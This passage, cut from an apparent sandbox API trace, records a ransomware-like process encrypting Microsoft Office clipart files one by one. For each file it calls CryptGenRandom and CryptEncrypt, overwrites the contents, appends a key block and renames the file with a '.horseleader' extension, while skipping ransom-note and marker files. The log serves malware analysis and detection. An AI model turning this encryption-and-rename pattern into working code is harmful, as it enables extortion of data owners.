dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.878] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0253.878] StrStrW (lpFirst="DD00121_.WMF", lpSrch=".txt") returned 0x0 [0253.878] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8256) returned 1 [0253.878] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2040, lpOverlapped=0x0) returned 1 [0253.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdfc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.880] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2040, lpOverlapped=0x0) returned 1 [0253.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.880] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.880] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.881] CloseHandle (hObject=0x158) returned 1 [0253.881] GetProcessHeap () returned 0x780000 [0253.881] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.881] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.horseleader") returned 79 [0253.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.horseleader")) returned 1 [0253.882] GetProcessHeap () returned 0x780000 [0253.882] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.882] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x73bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00234_.WMF", cAlternateFileName="")) returned 1 [0253.882] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="Windows") returned -1 [0253.882] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0253.882] StrStrIW (lpFirst="DD00234_.WMF", lpSrch=".horseleader") returned 0x0 [0253.882] lstrcmpW (lpString1="DD00234_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.882] lstrcmpW (lpString1="DD00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.882] lstrlenW (lpString=".testttjffg") returned 11 [0253.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0253.883] StrStrW (lpFirst="DD00234_.WMF", lpSrch=".txt") returned 0x0 [0253.883] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=29628) returned 1 [0253.883] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.886] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x23bc, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdc44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x23bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x23bc, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.887] CloseHandle (hObject=0x158) returned 1 [0253.887] GetProcessHeap () returned 0x780000 [0253.887] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.887] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.horseleader") returned 79 [0253.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.horseleader")) returned 1 [0253.888] GetProcessHeap () returned 0x780000 [0253.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.888] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf650000, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf650000, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00255_.WMF", cAlternateFileName="")) returned 1 [0253.888] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="Windows") returned -1 [0253.888] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0253.888] StrStrIW (lpFirst="DD00255_.WMF", lpSrch=".horseleader") returned 0x0 [0253.888] lstrcmpW (lpString1="DD00255_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.888] lstrcmpW (lpString1="DD00255_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.888] lstrlenW (lpString=".testttjffg") returned 11 [0253.888] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.888] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.888] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0253.890] StrStrW (lpFirst="DD00255_.WMF", lpSrch=".txt") returned 0x0 [0253.890] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2690) returned 1 [0253.890] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa82, lpOverlapped=0x0) returned 1 [0253.892] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff57e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa82, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa82, lpOverlapped=0x0) returned 1 [0253.892] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.892] CloseHandle (hObject=0x158) returned 1 [0253.892] GetProcessHeap () returned 0x780000 [0253.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.892] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.horseleader") returned 79 [0253.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.horseleader")) returned 1 [0253.893] GetProcessHeap () returned 0x780000 [0253.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.893] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00256_.WMF", cAlternateFileName="")) returned 1 [0253.893] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="Windows") returned -1 [0253.893] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0253.893] StrStrIW (lpFirst="DD00256_.WMF", lpSrch=".horseleader") returned 0x0 [0253.893] lstrcmpW (lpString1="DD00256_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.893] lstrcmpW (lpString1="DD00256_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.894] lstrlenW (lpString=".testttjffg") returned 11 [0253.894] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.894] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.894] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.894] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0253.894] StrStrW (lpFirst="DD00256_.WMF", lpSrch=".txt") returned 0x0 [0253.894] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2832) returned 1 [0253.894] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb10, lpOverlapped=0x0) returned 1 [0253.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff4f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.896] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb10, lpOverlapped=0x0) returned 1 [0253.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.896] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.896] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.897] CloseHandle (hObject=0x158) returned 1 [0253.897] GetProcessHeap () returned 0x780000 [0253.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.897] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.horseleader") returned 79 [0253.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.horseleader")) returned 1 [0253.898] GetProcessHeap () returned 0x780000 [0253.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.898] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe550c00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbe550c00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x9456, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00261_.WMF", cAlternateFileName="")) returned 1 [0253.898] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="Windows") returned -1 [0253.898] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0253.898] StrStrIW (lpFirst="DD00261_.WMF", lpSrch=".horseleader") returned 0x0 [0253.898] lstrcmpW (lpString1="DD00261_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.898] lstrcmpW (lpString1="DD00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.898] lstrlenW (lpString=".testttjffg") returned 11 [0253.898] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.898] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0253.899] StrStrW (lpFirst="DD00261_.WMF", lpSrch=".txt") returned 0x0 [0253.899] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=37974) returned 1 [0253.899] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.901] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.902] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.902] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4456, lpOverlapped=0x0) returned 1 [0253.903] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbbaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4456, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4456, lpOverlapped=0x0) returned 1 [0253.903] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.903] CloseHandle (hObject=0x158) returned 1 [0253.903] GetProcessHeap () returned 0x780000 [0253.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.903] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.horseleader") returned 79 [0253.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.horseleader")) returned 1 [0253.905] GetProcessHeap () returned 0x780000 [0253.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.905] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8572f00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8572f00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00297_.WMF", cAlternateFileName="")) returned 1 [0253.905] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="Windows") returned -1 [0253.905] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0253.905] StrStrIW (lpFirst="DD00297_.WMF", lpSrch=".horseleader") returned 0x0 [0253.905] lstrcmpW (lpString1="DD00297_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.905] lstrcmpW (lpString1="DD00297_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.905] lstrlenW (lpString=".testttjffg") returned 11 [0253.905] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.905] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.905] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0253.906] StrStrW (lpFirst="DD00297_.WMF", lpSrch=".txt") returned 0x0 [0253.906] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=40030) returned 1 [0253.906] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.908] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.909] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: 